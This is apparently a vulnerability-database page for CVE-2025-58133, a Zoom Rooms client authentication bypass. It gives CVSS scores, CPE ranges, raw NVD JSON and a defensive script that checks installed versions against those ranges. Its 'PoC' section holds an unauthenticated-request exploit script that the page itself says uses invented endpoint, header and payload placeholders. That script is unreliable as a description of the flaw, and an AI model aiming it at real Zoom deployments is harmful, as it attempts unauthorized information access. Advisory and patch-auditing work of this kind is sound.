Security Vulnerability Report
CVE-2025-58133 CVSS 5.3 MEDIUM

CVE-2025-58133

Published: 2025-10-15 17:16:00
Last Modified: 2025-10-21 19:33:56

Description

Authentication bypass in some Zoom Rooms Clients before version 6.5.1 may allow an unauthenticated user to conduct a disclosure of information via network access.

CVSS Details

The raw NVD record carries two CVSS 3.1 assessments. Zoom's (secondary) vector is the one shown in the page header; NVD's own (primary) analysis scores the same flaw higher because it drops the Attack Complexity: High and User Interaction: Required qualifiers. Both agree the issue is network-reachable, needs no privileges, and affects confidentiality only.

CVSS Score (Zoom, secondary)
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

CVSS Score (NVD, primary)
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Weakness
CWE-288 (Authentication Bypass Using an Alternate Path or Channel)

Configurations (Affected Products)

cpe:2.3:a:zoom:rooms:*:*:*:*:*:android:*:* - VULNERABLE
cpe:2.3:a:zoom:rooms:*:*:*:*:*:ipados:*:* - VULNERABLE
cpe:2.3:a:zoom:rooms:*:*:*:*:*:iphone_os:*:* - VULNERABLE
cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:* - VULNERABLE
cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:* - VULNERABLE
Zoom Rooms Client < 6.5.1
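A fleet check should match installed versions against the record's CPE ranges rather than against the "< 6.5.1" summary line, because the ranges carry the platform (target_sw) and the exclusive/inclusive bound semantics. The script below is an added example, not part of the NVD record; NVD_CONFIGURATIONS is a trimmed copy of the configurations node from the raw JSON on this page (matchCriteriaId dropped), and INVENTORY is constructed sample data whose platform names follow NVD's target_sw spelling.

```python
"""Match an installed-version inventory against the NVD CPE ranges in this record.

Added example, not part of the NVD record. NVD_CONFIGURATIONS is a trimmed copy
of the 'configurations' node from the raw JSON on this page (matchCriteriaId
dropped); INVENTORY is constructed sample data. Only OR nodes without negate
are handled, which is all this record uses.
"""

NVD_CONFIGURATIONS = [{"nodes": [{"operator": "OR", "negate": False, "cpeMatch": [
    {"vulnerable": True, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:android:*:*", "versionEndExcluding": "6.5.1"},
    {"vulnerable": True, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:ipados:*:*", "versionEndExcluding": "6.5.1"},
    {"vulnerable": True, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding": "6.5.1"},
    {"vulnerable": True, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.1"},
    {"vulnerable": True, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.1"},
]}]}]

# Constructed inventory: (room name, target_sw as NVD spells it, installed version).
INVENTORY = [
    ("room-101", "windows", "6.5.0"),    # below the fix
    ("room-102", "macos", "6.5.1"),      # exactly the fix; versionEndExcluding means not vulnerable
    ("room-103", "android", "6.4.10"),   # below the fix
    ("room-104", "windows", "6.10.0"),   # above the fix; a string compare would wrongly flag it
    ("room-105", "linux", "6.5.0"),      # the record lists no CPE for this platform
]


def version_key(version: str) -> tuple:
    """'6.5.10' -> (6, 5, 10): compare components numerically, not lexically.

    Non-numeric suffixes (e.g. '-beta') must be stripped by the caller.
    """
    return tuple(int(part) for part in version.split("."))


def in_range(version: str, match: dict) -> bool:
    """Apply whichever versionStart*/versionEnd* bounds one cpeMatch entry carries."""
    v = version_key(version)
    bounds = (
        ("versionStartIncluding", lambda b: v >= b),
        ("versionStartExcluding", lambda b: v > b),
        ("versionEndIncluding", lambda b: v <= b),
        ("versionEndExcluding", lambda b: v < b),
    )
    return all(ok(version_key(match[key])) for key, ok in bounds if key in match)


def cpe_fields(criteria: str) -> dict:
    """Pull the needed fields out of a CPE 2.3 formatted string.

    Layout: cpe:2.3:part:vendor:product:version:update:edition:language:
            sw_edition:target_sw:target_hw:other
    """
    f = criteria.split(":")
    return {"vendor": f[3], "product": f[4], "version": f[5], "target_sw": f[10]}


def check_install(platform: str, version: str, configurations=NVD_CONFIGURATIONS) -> str:
    """Return 'vulnerable', 'fixed' or 'unlisted' for one install."""
    listed = False
    for config in configurations:
        for node in config["nodes"]:
            for match in node["cpeMatch"]:
                cpe = cpe_fields(match["criteria"])
                if (cpe["vendor"], cpe["product"]) != ("zoom", "rooms"):
                    continue
                if cpe["target_sw"] not in ("*", platform):
                    continue
                # A concrete version in the CPE must match exactly; '*' defers to the bounds.
                if cpe["version"] != "*" and version_key(cpe["version"]) != version_key(version):
                    continue
                listed = True
                if match["vulnerable"] and in_range(version, match):
                    return "vulnerable"
    return "fixed" if listed else "unlisted"


def audit(inventory=INVENTORY) -> dict:
    """Map each room to its status; 'unlisted' needs a human look, not a green tick."""
    return {room: check_install(platform, version) for room, platform, version in inventory}


if __name__ == "__main__":
    for room, status in audit().items():
        print(f"{room}: {status}")
```

Two points the sample inventory is built to show: 6.5.1 itself is clean because the bound is versionEndExcluding, and 6.10.0 must compare as newer than 6.5.1, which a plain string comparison gets wrong. Platforms with no CPE entry come back as "unlisted" rather than "fixed" so they are not silently treated as safe.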

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that neither the NVD description nor the CVSS data on this page describes how the bypass works: the endpoint path, request headers and "bypass_auth" field in the script below are illustrative placeholders, not confirmed details of the flaw, and the script will not reproduce the vulnerability against a real deployment as written.
python
# CVE-2025-58133 - Zoom Rooms Client Authentication Bypass PoC
# This PoC illustrates the shape of an unauthenticated information-disclosure
# request against Zoom Rooms Client < 6.5.1. The endpoint, headers and payload
# are placeholders: the public record does not document the real mechanism.
# Note: This is for educational and authorized testing purposes only
import json

import requests

# Target Zoom Rooms server endpoint (placeholder host; replace with the lab target)
TARGET_HOST = "zoom_rooms_server"
TARGET_PORT = 443


def exploit_auth_bypass(target_url):
    """
    Attempt an unauthenticated request against a Zoom Rooms Client endpoint.
    Returns the decoded JSON body on HTTP 200, otherwise None.
    """
    # Step 1: Craft a request that carries no authentication at all.
    # The "X-Zoom-Room-Client" header and the User-Agent string are assumptions.
    headers = {
        "User-Agent": "ZoomRooms/6.5.0",
        "Content-Type": "application/json",
        "X-Zoom-Room-Client": "true",
    }

    # Step 2: Placeholder payload. "bypass_auth" is not a documented parameter;
    # it stands in for whatever alternate path (CWE-288) the real flaw used.
    bypass_payload = {
        "action": "get_room_info",
        "room_id": "target_room_id",
        "bypass_auth": True,
    }

    try:
        # Step 3: Send the request. verify=False disables TLS certificate
        # validation; acceptable only against a lab target with self-signed certs.
        response = requests.post(
            f"{target_url}/api/room/info",   # placeholder path, not from the advisory
            headers=headers,
            json=bypass_payload,
            verify=False,
            timeout=10,
        )
        if response.status_code == 200:
            print("[+] Request accepted without authentication")
            print(f"[+] Response body: {response.text}")
            return response.json()
        print(f"[-] Request rejected with status: {response.status_code}")
        return None
    except (requests.RequestException, ValueError) as e:
        # RequestException covers connection/TLS errors; ValueError covers non-JSON bodies.
        print(f"[-] Error during request: {e}")
        return None


# Usage example
if __name__ == "__main__":
    target = f"https://{TARGET_HOST}:{TARGET_PORT}"
    result = exploit_auth_bypass(target)
    if result:
        print(json.dumps(result, indent=2))

References

https://www.zoom.com/en/trust/security-bulletin/zsb-25039 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58133", "sourceIdentifier": "[email protected]", "published": "2025-10-15T17:16:00.090", "lastModified": "2025-10-21T19:33:55.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication bypass in some Zoom Rooms Clients before version 6.5.1 may allow an unauthenticated user to conduct a disclosure of information via network access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:android:*:*", "versionEndExcluding": "6.5.1", "matchCriteriaId": "5F43E07C-FDDF-4EE9-A612-B9F30B311E9F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:ipados:*:*", "versionEndExcluding": "6.5.1", "matchCriteriaId": "31BF8FF7-E17F-4C33-BB19-20DCDF9F60AD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:iphone_os:*:*", 
"versionEndExcluding": "6.5.1", "matchCriteriaId": "95D60842-5391-4EA5-BAE9-746CF093E584"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.1", "matchCriteriaId": "89EE0AD4-5643-4398-9775-61E14139B8DE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.1", "matchCriteriaId": "C8105933-373D-4DC2-A41C-E9C22AF32BA0"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25039", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}